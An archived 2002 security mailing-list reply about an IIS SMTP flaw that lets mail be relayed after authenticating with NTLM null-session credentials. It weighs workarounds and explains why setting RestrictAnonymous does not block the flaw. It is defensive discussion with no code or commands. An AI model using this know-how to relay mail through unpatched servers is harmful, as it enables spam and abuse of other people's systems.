|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Todd Sabin (tsabin
razor.bindview.com)Date: Mon Mar 04 2002 - 22:23:02 CST
"Toni Lassila" <toni.lassilamc-europe.com> writes:
> > Overview:
> > IIS comes with a small SMTP component. The default settings allow
> > anyone who can authenticate to it to relay email. Because the
> > authentication system supports NTLM, it is possible for anyone to
> > authenticate using null session credentials, and then relay email.
> >
> > Workarounds:
> > Disable the SMTP service.
> > Disable the ability of authenticated users to relay email.
> > Firewall off the SMTP service from untrusted networks.
>
> I suspect turning off NTLM authentication and allowing only Basic
> Authentication (with or without TLS),
I tried this, and it appears to be effective.
> or alternatively disabling
> null session access (details are in many MS KB) from the server
> are two possible workarounds as well. Disabling null sessions is
> one of those security features one should do when securing a
> Windows-based server anyway.
If by "disabling null sessions" you mean setting RestrictAnonymous to
1 or 2, then that is not effective. RestrictAnonymous doesn't disable
anonymous access, it just places additional restrictions on it. You
can still authenticate just fine with a null session when RA=2, and
that's all you need for relaying.
Todd
-- Todd Sabin <tas
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]